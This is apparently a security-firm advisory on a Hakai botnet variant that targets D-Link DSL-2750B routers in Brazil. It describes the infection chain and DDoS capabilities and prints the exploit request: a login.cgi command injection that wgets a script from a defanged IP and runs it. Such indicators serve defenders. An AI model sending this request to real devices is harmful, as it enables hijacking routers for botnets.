Tempest’s monitoring team identified a quite active variant of Haikai botnet, attempting to exploit vulnerabilities in D-Link DSL-2750B routers in Latin America, particularly in Brazil.

This botnet has been detected by our sensors 134 times just this month and, so far, it is using 119 different IP addresses.

The infection method is the same as used by other botnets that have been widely reported by Tempest and other researchers. It takes advantage of a remote command execution vulnerability in which the attacker downloads a Shell Script file that runs on the device and, depending on the device architecture, will download the appropriate binary (hakai.mips, hakai.mpls, hakai. x86_x64). The binary uses a packer called UPX (Ultimate Packer for eXecutables), which is well known and open source, available on GitHub.

After the infection, the device connects to the attacker’s control panel and receives commands to attack or to attempt to infect other devices.

The control panel closely resembles to Gafgyt botnet, which had its source code released years ago and was also identified as LizardStresser — the botnet used by the Lizard Squad group in its DDoS-as-a-service. This variant is able to trigger HTTP, UDP, TCP and STD attacks. STD attacks occur when the attacker sends packets with a random payload of 1024 bytes.



GET /login.cgi?cli=aa aa’;wget hxxp://46[.]166[.]185[.]42/e -O -> /tmp/hk;sh /tmp/hk’

Payload source:


Hash MD5:


Hash SHA256:


Unique IPs